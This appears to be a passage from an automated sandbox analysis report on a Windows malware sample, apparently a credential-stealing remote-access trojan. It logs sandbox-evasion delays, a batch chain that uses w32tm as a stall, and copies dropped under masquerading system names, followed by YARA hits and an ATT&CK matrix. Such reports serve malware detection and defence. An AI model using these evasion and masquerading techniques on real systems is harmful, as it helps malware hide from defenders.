Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -594922s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -594812s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -594703s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -594594s >= -30000s
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 30000
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 600000
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 3600000
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File opened: C:\Users\user\AppData\Local
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File opened: C:\Users\user\Desktop\desktop.ini
                              Source: w32tm.exe, 00000005.00000002.2056764410.0000017A94402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2007578949.000000001B9B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: E#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4443109616.000000001B518000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Process token adjusted: Debug
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Memory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe "C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe"
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerp
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Queries volume information: C:\Users\user\Desktop\4Osfx7gnSx.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Queries volume information: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe VolumeInformation
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Stealing of Sensitive Information

                              Source: Yara match, File source: 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000000.00000002.2005023300.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: 4Osfx7gnSx.exe PID: 3524, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: izvoheVaDbpPfPMLrEwQFH.exe PID: 2892, type: MEMORYSTR
                              Source: Yara match, File source: 4Osfx7gnSx.exe, type: SAMPLE
                              Source: Yara match, File source: 0.0.4Osfx7gnSx.exe.b20000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000000.00000000.1985120867.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match, File source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files (x86)\Microsoft.NET\Idle.exe, type: DROPPED

                              Remote Access Functionality

                              Source: Yara match, File source: 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000000.00000002.2005023300.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: 4Osfx7gnSx.exe PID: 3524, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: izvoheVaDbpPfPMLrEwQFH.exe PID: 2892, type: MEMORYSTR
                              Source: Yara match, File source: 4Osfx7gnSx.exe, type: SAMPLE
                              Source: Yara match, File source: 0.0.4Osfx7gnSx.exe.b20000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000000.00000000.1985120867.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match, File source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files (x86)\Microsoft.NET\Idle.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information1
                              Scripting
                              Valid AccountsWindows Management Instrumentation1
                              Scripting
                              12
                              Process Injection
                              13
                              Masquerading
                              OS Credential Dumping21
                              Security Software Discovery
                              Remote Services11
                              Archive Collected Data
                              1
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              1
                              Disable or Modify Tools
                              LSASS Memory2
                              Process Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Application Layer Protocol
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                              Virtualization/Sandbox Evasion
                              Security Account Manager131
                              Virtualization/Sandbox Evasion
                              SMB/Windows Admin SharesData from Network Shared Drive11
                              Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Process Injection
                              NTDS1
                              Application Window Discovery
                              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Deobfuscate/Decode Files or Information
                              LSA Secrets2
                              File and Directory Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                              Obfuscated Files or Information
                              Cached Domain Credentials113
                              System Information Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                              Software Packing
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.